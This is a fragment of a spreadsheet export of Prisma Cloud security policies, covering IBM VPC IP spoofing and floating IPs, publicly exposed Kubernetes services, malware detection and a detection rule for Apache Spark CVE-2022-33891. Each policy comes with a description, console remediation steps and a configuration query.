      <c r="O3374" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3374" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3374" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R3374" t="inlineStr">
        <is>
          <t>SC-05-00 : Denial-of-service Protection</t>
        </is>
      </c>
      <c r="S3374" t="inlineStr"/>
      <c r="T3374" t="b">
        <v>0</v>
      </c>
      <c r="U3374" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3374" t="inlineStr">
        <is>
          <t>ibm-vpc-virtual-server-instance</t>
        </is>
      </c>
      <c r="W3374" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud Virtual Servers for VPC instances which has any interfaces with IP-spoofing enabled. If any interface has IP-spoofing enabled, there is a chance of bad actors trying to modify the source address in IP packets to invoke a DDoS attack. It is recommended that IP-spoofing is disabled for all interfaces of a virtual server for VPC</t>
        </is>
      </c>
      <c r="X3374" t="inlineStr">
        <is>
          <t>1. Log in to the IBM Cloud Console 
2. Click on 'Menu Icon' and navigate to 'VPC Infrastructure' and then 'Virtual server instances'
3. Select the 'Virtual server instance' reported in the alert 
4. Under 'Network interfaces' tab, click on edit icon and set 'Allow IP spoofing' to disabled for each network interface. 
5. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y3374" t="inlineStr"/>
      <c r="Z3374" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-vpc-virtual-server-instance' AND json.rule = status equal ignore case "running" AND network_interfaces[?any( allow_ip_spoofing is true )] exists</t>
        </is>
      </c>
      <c r="AA3374" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3374" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3374" t="inlineStr">
        <is>
          <t>PC-IBM-VSP-970</t>
        </is>
      </c>
      <c r="AD3374" t="b">
        <v>1</v>
      </c>
      <c r="AE3374" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3374" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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4" t="inlineStr">
        <is>
          <t>4078571a-dcee-4ba8-935d-fda28c47002d</t>
        </is>
      </c>
      <c r="AI3374" t="inlineStr">
        <is>
          <t>5f0d481f-eb0c-4c07-9624-2d2b28022222</t>
        </is>
      </c>
      <c r="AJ3374" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3374" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3375">
      <c r="A3375" t="inlineStr">
        <is>
          <t>Insurance Regulatory And Development Authority Of India</t>
        </is>
      </c>
      <c r="B3375" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3375" s="2" t="inlineStr"/>
      <c r="D3375" t="inlineStr"/>
      <c r="E3375" t="inlineStr"/>
      <c r="F3375" t="inlineStr"/>
      <c r="G3375" t="b">
        <v>1</v>
      </c>
      <c r="H33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5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3375" t="inlineStr">
        <is>
          <t>ibm-vpc</t>
        </is>
      </c>
      <c r="K3375" t="inlineStr">
        <is>
          <t>IBM Cloud Virtual Servers for VPC instance have floating IP address</t>
        </is>
      </c>
      <c r="L3375" t="inlineStr"/>
      <c r="M3375" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3375" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3375" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3375" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3375" t="inlineStr">
        <is>
          <t>Security Domain Policies</t>
        </is>
      </c>
      <c r="R3375" t="inlineStr">
        <is>
          <t>Cloud Security Policy</t>
        </is>
      </c>
      <c r="S3375" t="inlineStr"/>
      <c r="T3375" t="b">
        <v>0</v>
      </c>
      <c r="U3375" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3375" t="inlineStr">
        <is>
          <t>ibm-vpc-virtual-server-instance</t>
        </is>
      </c>
      <c r="W3375" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud Virtual Servers for VPC instances which have floating IP assigned. If any virtual server instance has floating IP address attached, it can be reachable from public internet independent of whether its subnet is attached to a public gateway. It is recommended to not attach any floating IP to virtual server instances.</t>
        </is>
      </c>
      <c r="X3375" t="inlineStr">
        <is>
          <t>1. Log in to the IBM Cloud Console
2. Click on 'Menu Icon' and navigate to 'VPC Infrastructure' and then 'Virtual server instances'
3. Select the 'Virtual server instances' reported in the alert
4. Under 'Network Interfaces' tab, click on edit icon 
5. Under 'Floating IP' dropdown, select 'Unbind current floating IP'
6. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y3375" t="inlineStr"/>
      <c r="Z3375" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-vpc-virtual-server-instance' AND json.rule = status equal ignore case "running" AND network_interfaces[?any( floating_ips is not empty)] exists</t>
        </is>
      </c>
      <c r="AA3375" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3375" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3375" t="inlineStr">
        <is>
          <t>PC-IBM-VSP-969</t>
        </is>
      </c>
      <c r="AD3375" t="b">
        <v>1</v>
      </c>
      <c r="AE3375" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3375" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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5" t="inlineStr">
        <is>
          <t>ee1ce5ea-1347-4499-8436-1cd14efcf2e7</t>
        </is>
      </c>
      <c r="AI3375" t="inlineStr">
        <is>
          <t>aed8ef2a-41b5-4faa-ae96-12fefc670b5b</t>
        </is>
      </c>
      <c r="AJ3375" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3375" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3376">
      <c r="A3376" t="inlineStr"/>
      <c r="B3376" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3376" s="2" t="inlineStr"/>
      <c r="D3376" t="inlineStr"/>
      <c r="E3376" t="inlineStr"/>
      <c r="F3376" t="inlineStr"/>
      <c r="G3376" t="b">
        <v>1</v>
      </c>
      <c r="H33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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3376" t="inlineStr">
        <is>
          <t>k8s-service</t>
        </is>
      </c>
      <c r="K3376" t="inlineStr">
        <is>
          <t>Unauthorized access risk due to publicly exposed Azure AKS K8s service associated with vulnerable container image</t>
        </is>
      </c>
      <c r="L3376" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3376" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N3376" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3376" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P3376" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q3376" t="inlineStr"/>
      <c r="R3376" t="inlineStr"/>
      <c r="S3376" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3376" t="b">
        <v>0</v>
      </c>
      <c r="U3376" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3376" t="inlineStr">
        <is>
          <t>k8s-service</t>
        </is>
      </c>
      <c r="W3376" t="inlineStr">
        <is>
          <t>This policy identifies Azure AKS K8s services that are publicly exposed and have critical or high vulnerabilities in container images associated with the K8s service.
Attackers can exploit these vulnerabilities to compromise the confidentiality, integrity, and availability of the affected container images associated with the K8s service, enabling them to perform malicious actions. The public exposure of these vulnerable container images associated with the K8s service makes them an easy target for attacks.
Immediate attention is needed to remediate the critical and high vulnerabilities on the container images and restrict public exposure reported for the K8s services.</t>
        </is>
      </c>
      <c r="X3376" t="inlineStr">
        <is>
          <t>[INTERNET_EXPOSURE]
The following steps are recommended to restrict Azure AKS K8s service from having unrestricted access from the Internet:
1. Visit the Network path Analysis from Source to Destination and review the network path components that allow internet access.
2. Implement the required changes and make sure no other resources have been impacted due to these changes:
  a) The overly permissive firewall rules can be made more restrictive.
  b) Move the container/app inside a restrictive subnet if it does not need to be publicly accessible.
  c) Remove or disassociate the public IP assigned to the respective container service.
3. Following are the options specific to Azure K8s service which helps in restricting traffic to specific entities,
  a) Apply Network Policy in K8s service pods by restricting communication to specific pods, namespaces, and IP ranges.
  b) Restrict inbound traffic to specific IP ranges using loadBalancerSourceRanges by specifying a new IP range for inbound external traffic.
  c) If the K8s service is intended to be not public, create a new internal load balancer by specifying the IP address residing in the same virtual network as the AKS cluster and delete the reported K8s service.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3376" t="inlineStr"/>
      <c r="Z3376" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('k8s-service') and finding.name contains all ('Azure AKS K8s service with network path from the internet (0.0.0.0/0)') AND relation: 'is_associated_with' : ( asset WHERE asset.type IN ('container-image') AND with : (Vuln WHERE severity greater than or equal to high))</t>
        </is>
      </c>
      <c r="AA3376" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3376" t="inlineStr">
        <is>
          <t>2024-04-26 08:12:45</t>
        </is>
      </c>
      <c r="AC3376" t="inlineStr"/>
      <c r="AD3376" t="b">
        <v>1</v>
      </c>
      <c r="AE3376" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3376" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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6" t="inlineStr">
        <is>
          <t>9f7ef9b9-e2e9-4919-8681-526d04214f00</t>
        </is>
      </c>
      <c r="AI3376" t="inlineStr">
        <is>
          <t>ce5277a0-baf7-405f-baf7-1a319f5d8d08</t>
        </is>
      </c>
      <c r="AJ3376" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3376" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3377">
      <c r="A3377" t="inlineStr"/>
      <c r="B3377" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3377" s="2" t="inlineStr"/>
      <c r="D3377" t="inlineStr"/>
      <c r="E3377" t="inlineStr"/>
      <c r="F3377" t="inlineStr"/>
      <c r="G3377" t="b">
        <v>1</v>
      </c>
      <c r="H337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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3377" t="inlineStr">
        <is>
          <t>k8s-service</t>
        </is>
      </c>
      <c r="K3377" t="inlineStr">
        <is>
          <t>Unauthorized access risk due to publicly exposed AWS EKS K8s service associated with vulnerable container image</t>
        </is>
      </c>
      <c r="L3377" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3377" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N3377" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3377" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P3377" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q3377" t="inlineStr"/>
      <c r="R3377" t="inlineStr"/>
      <c r="S3377" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3377" t="b">
        <v>0</v>
      </c>
      <c r="U3377" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3377" t="inlineStr">
        <is>
          <t>k8s-service</t>
        </is>
      </c>
      <c r="W3377" t="inlineStr">
        <is>
          <t>This policy identifies AWS EKS K8s services that are publicly exposed and have critical or high vulnerabilities in the container images associated with the K8s service.
Attackers can exploit these vulnerabilities to compromise the confidentiality, integrity, and availability of the affected container images associated with the K8s service, enabling them to perform malicious actions. The public exposure of these vulnerable container images associated with the K8s service makes them an easy target for attacks.
Immediate attention is needed to remediate the critical and high vulnerabilities on the container images and restrict public exposure reported for the K8s services.</t>
        </is>
      </c>
      <c r="X3377" t="inlineStr">
        <is>
          <t>[INTERNET_EXPOSURE]
The following steps are recommended to restrict AWS EKS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container/app inside a restrictive subnet if it does not need to be publicly accessible.
  c) Control access to service by specifying allowed IP addresses or ranges in the service configuration.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3377" t="inlineStr"/>
      <c r="Z3377" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('k8s-service') and finding.name contains all ('AWS EKS K8s service with network path from the internet (0.0.0.0/0)') AND relation: 'is_associated_with' : ( asset WHERE asset.type IN ('container-image') AND with : (Vuln WHERE severity greater than or equal to high))</t>
        </is>
      </c>
      <c r="AA3377" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3377" t="inlineStr">
        <is>
          <t>2024-04-26 08:12:45</t>
        </is>
      </c>
      <c r="AC3377" t="inlineStr"/>
      <c r="AD3377" t="b">
        <v>1</v>
      </c>
      <c r="AE3377" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3377" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG337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7" t="inlineStr">
        <is>
          <t>7f83bc57-a284-4983-8ae9-f61c267a8ae3</t>
        </is>
      </c>
      <c r="AI3377" t="inlineStr">
        <is>
          <t>19c09272-febe-43c9-a7c5-44bc35e4e4c6</t>
        </is>
      </c>
      <c r="AJ3377" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3377" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3378">
      <c r="A3378" t="inlineStr"/>
      <c r="B3378" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3378" s="2" t="inlineStr"/>
      <c r="D3378" t="n">
        <v>2</v>
      </c>
      <c r="E3378" t="n">
        <v>0</v>
      </c>
      <c r="F3378" t="n">
        <v>0</v>
      </c>
      <c r="G3378" t="b">
        <v>1</v>
      </c>
      <c r="H33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378" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3378" t="inlineStr">
        <is>
          <t>k8s-service</t>
        </is>
      </c>
      <c r="K3378" t="inlineStr">
        <is>
          <t>Unauthorized access risk due to publicly exposed GCP GKE K8s service associated with vulnerable container image</t>
        </is>
      </c>
      <c r="L3378" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3378" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N3378" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3378" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P3378" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q3378" t="inlineStr"/>
      <c r="R3378" t="inlineStr"/>
      <c r="S3378" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3378" t="b">
        <v>0</v>
      </c>
      <c r="U3378" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3378" t="inlineStr">
        <is>
          <t>k8s-service</t>
        </is>
      </c>
      <c r="W3378" t="inlineStr">
        <is>
          <t>This policy identifies GCP GKE K8s services that are publicly exposed and have critical or high vulnerabilities in the container images associated with the K8s service.
Attackers can exploit these vulnerabilities to compromise the confidentiality, integrity, and availability of the affected container images associated with the K8s service, enabling them to perform malicious actions. The public exposure of these vulnerable container images associated with the K8s service makes them an easy target for attacks.
Immediate attention is needed to remediate the critical and high vulnerabilities on the container images and restrict public exposure reported for the K8s services.</t>
        </is>
      </c>
      <c r="X3378" t="inlineStr">
        <is>
          <t>[INTERNET_EXPOSURE]
The following steps are recommended to restrict GCP GKE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firewall rules can be made more restrictive.
  b) Move the container/app inside a restrictive subnet if it does not need to be publicly accessible.
  c) Remove or disassociate the public IP assigned to the respective container service.
[VULNERABILITY]
Investigate, assess, prioritize, and patch high or critical vulnerabilities
1. Investigate the affected software or package. Understand what the vulnerability is, what it affects, and how it can potentially be exploited.
2. Determine the exploitability of the vulnerability based on your system's configurations and environment. For instance, if the vulnerable software is not currently running or if the package is not in use, it may not be exploitable.
3. Prioritize the vulnerabilities that can be exploited remotely as they pose a higher risk. Once prioritized, apply patches or updates to fix the vulnerabilities. If patches are not immediately available, consider implementing temporary workarounds or mitigations to reduce the risk until a patch is released.</t>
        </is>
      </c>
      <c r="Y3378" t="inlineStr"/>
      <c r="Z3378" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('k8s-service') and finding.name contains all ('GCP GKE K8s service with network path from the internet (0.0.0.0/0)') AND relation: 'is_associated_with' : ( asset WHERE asset.type IN ('container-image') AND with : (Vuln WHERE severity greater than or equal to high))</t>
        </is>
      </c>
      <c r="AA3378" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3378" t="inlineStr">
        <is>
          <t>2024-04-26 08:12:45</t>
        </is>
      </c>
      <c r="AC3378" t="inlineStr"/>
      <c r="AD3378" t="b">
        <v>1</v>
      </c>
      <c r="AE3378" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3378" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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378" t="inlineStr">
        <is>
          <t>2303db83-5b9c-4cee-acc0-ff93d6060f97</t>
        </is>
      </c>
      <c r="AI3378" t="inlineStr">
        <is>
          <t>9578a883-d2b8-4501-9381-7594ec093bc8</t>
        </is>
      </c>
      <c r="AJ3378" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3378" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3379">
      <c r="A3379" t="inlineStr"/>
      <c r="B3379" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3379" s="2" t="inlineStr"/>
      <c r="D3379" t="inlineStr"/>
      <c r="E3379" t="inlineStr"/>
      <c r="F3379" t="inlineStr"/>
      <c r="G3379" t="b">
        <v>1</v>
      </c>
      <c r="H337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79" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3379" t="inlineStr">
        <is>
          <t>malware_container_image</t>
        </is>
      </c>
      <c r="K3379" t="inlineStr">
        <is>
          <t>Container image contains Malware</t>
        </is>
      </c>
      <c r="L3379" t="inlineStr">
        <is>
          <t>MALWARE</t>
        </is>
      </c>
      <c r="M3379" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3379" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3379" t="inlineStr">
        <is>
          <t>malware</t>
        </is>
      </c>
      <c r="P3379" t="inlineStr">
        <is>
          <t>container_image</t>
        </is>
      </c>
      <c r="Q3379" t="inlineStr"/>
      <c r="R3379" t="inlineStr"/>
      <c r="S3379" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3379" t="b">
        <v>0</v>
      </c>
      <c r="U3379" t="inlineStr">
        <is>
          <t>workload_detection</t>
        </is>
      </c>
      <c r="V3379" t="inlineStr">
        <is>
          <t>malware</t>
        </is>
      </c>
      <c r="W3379" t="inlineStr">
        <is>
          <t>Identify if malware has been detected on a container image</t>
        </is>
      </c>
      <c r="X3379" t="inlineStr">
        <is>
          <t>Including files flagged as malware in container images poses significant security risks. It can lead to system infections, data breaches, and application disruptions. Maintain a secure environment by excluding such files from container images.</t>
        </is>
      </c>
      <c r="Y3379" t="inlineStr"/>
      <c r="Z3379" t="inlineStr"/>
      <c r="AA3379" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3379" t="inlineStr">
        <is>
          <t>2023-09-15 06:33:27</t>
        </is>
      </c>
      <c r="AC3379" t="inlineStr"/>
      <c r="AD3379" t="b">
        <v>1</v>
      </c>
      <c r="AE3379" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3379" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG337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79" t="inlineStr">
        <is>
          <t>92378cf4-23c1-4641-bf1d-6d6381defff9</t>
        </is>
      </c>
      <c r="AI3379" t="inlineStr"/>
      <c r="AJ3379" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3379" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3380">
      <c r="A3380" t="inlineStr"/>
      <c r="B3380" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3380" s="2" t="inlineStr"/>
      <c r="D3380" t="inlineStr"/>
      <c r="E3380" t="inlineStr"/>
      <c r="F3380" t="inlineStr"/>
      <c r="G3380" t="b">
        <v>1</v>
      </c>
      <c r="H338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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3380" t="inlineStr">
        <is>
          <t>malware_host</t>
        </is>
      </c>
      <c r="K3380" t="inlineStr">
        <is>
          <t>Host contains Malware</t>
        </is>
      </c>
      <c r="L3380" t="inlineStr">
        <is>
          <t>MALWARE</t>
        </is>
      </c>
      <c r="M3380" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3380" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3380" t="inlineStr">
        <is>
          <t>malware</t>
        </is>
      </c>
      <c r="P3380" t="inlineStr">
        <is>
          <t>host</t>
        </is>
      </c>
      <c r="Q3380" t="inlineStr"/>
      <c r="R3380" t="inlineStr"/>
      <c r="S3380" t="inlineStr">
        <is>
          <t>Attack Path Rule,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3380" t="b">
        <v>0</v>
      </c>
      <c r="U3380" t="inlineStr">
        <is>
          <t>workload_detection</t>
        </is>
      </c>
      <c r="V3380" t="inlineStr">
        <is>
          <t>malware</t>
        </is>
      </c>
      <c r="W3380" t="inlineStr">
        <is>
          <t>Identify if malware has been detected on a host</t>
        </is>
      </c>
      <c r="X3380" t="inlineStr">
        <is>
          <t>Including files flagged as malware in a host filesystem poses significant security risks. It can lead to system infections, data breaches, and application disruptions. Maintain a secure environment by excluding such files from hosts.</t>
        </is>
      </c>
      <c r="Y3380" t="inlineStr"/>
      <c r="Z3380" t="inlineStr"/>
      <c r="AA3380" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3380" t="inlineStr">
        <is>
          <t>2023-12-08 04:25:02</t>
        </is>
      </c>
      <c r="AC3380" t="inlineStr"/>
      <c r="AD3380" t="b">
        <v>1</v>
      </c>
      <c r="AE3380" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3380" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG338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0" t="inlineStr">
        <is>
          <t>40034f69-a105-48a9-810d-8602bedc4235</t>
        </is>
      </c>
      <c r="AI3380" t="inlineStr"/>
      <c r="AJ3380" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3380" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3381">
      <c r="A3381" t="inlineStr"/>
      <c r="B3381" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3381" s="2" t="inlineStr"/>
      <c r="D3381" t="inlineStr"/>
      <c r="E3381" t="inlineStr"/>
      <c r="F3381" t="inlineStr"/>
      <c r="G3381" t="b">
        <v>1</v>
      </c>
      <c r="H338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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3381" t="inlineStr">
        <is>
          <t>virtual_patches_api</t>
        </is>
      </c>
      <c r="K3381" t="inlineStr">
        <is>
          <t>Attempt to exploit known vulnerabilities (CVE-2022-33891 - Apache Spark RCE) observed in HTTP traffic</t>
        </is>
      </c>
      <c r="L3381" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M3381" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3381" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3381" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3381" t="inlineStr">
        <is>
          <t>virtual_patches</t>
        </is>
      </c>
      <c r="Q3381" t="inlineStr"/>
      <c r="R3381" t="inlineStr"/>
      <c r="S3381" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3381" t="b">
        <v>0</v>
      </c>
      <c r="U3381" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3381" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3381" t="inlineStr">
        <is>
          <t>The policy utilizes custom detection techniques to identify known vulnerabilities with the aim of identifying targeted exploits.
The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as. This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.</t>
        </is>
      </c>
      <c r="X338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1" t="inlineStr"/>
      <c r="Z3381" t="inlineStr"/>
      <c r="AA3381" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3381" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC3381" t="inlineStr"/>
      <c r="AD3381" t="b">
        <v>1</v>
      </c>
      <c r="AE3381" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3381" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG338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1" t="inlineStr">
        <is>
          <t>4e9ac608-33b1-4f58-b47d-88b6a5eb220e</t>
        </is>
      </c>
      <c r="AI3381" t="inlineStr"/>
      <c r="AJ3381" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3381" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3382">
      <c r="A3382" t="inlineStr"/>
      <c r="B3382" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3382" s="2" t="inlineStr"/>
      <c r="D3382" t="inlineStr"/>
      <c r="E3382" t="inlineStr"/>
      <c r="F3382" t="inlineStr"/>
      <c r="G3382" t="b">
        <v>0</v>
      </c>
      <c r="H33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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3382" t="inlineStr">
        <is>
          <t>known_bots_api</t>
        </is>
      </c>
      <c r="K3382" t="inlineStr">
        <is>
          <t>Educational bot activity</t>
        </is>
      </c>
      <c r="L3382" t="inlineStr">
        <is>
          <t>BOT_ACTIVITY</t>
        </is>
      </c>
      <c r="M3382" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3382" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3382" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3382" t="inlineStr">
        <is>
          <t>known_bots</t>
        </is>
      </c>
      <c r="Q3382" t="inlineStr"/>
      <c r="R3382" t="inlineStr"/>
      <c r="S3382" t="inlineStr"/>
      <c r="T3382" t="b">
        <v>0</v>
      </c>
      <c r="U3382" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3382" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3382" t="inlineStr">
        <is>
          <t>This policy detects bots that crawl, extract and index information for educational purposes, such as academic search engines.</t>
        </is>
      </c>
      <c r="X338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2" t="inlineStr"/>
      <c r="Z3382" t="inlineStr"/>
      <c r="AA3382" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3382" t="inlineStr">
        <is>
          <t>2023-06-15 01:00:00</t>
        </is>
      </c>
      <c r="AC3382" t="inlineStr"/>
      <c r="AD3382" t="b">
        <v>1</v>
      </c>
      <c r="AE3382" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3382" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG33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2" t="inlineStr">
        <is>
          <t>a54a62d5-bc7c-4bed-b8c6-7c420c610bd4</t>
        </is>
      </c>
      <c r="AI3382" t="inlineStr"/>
      <c r="AJ3382" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
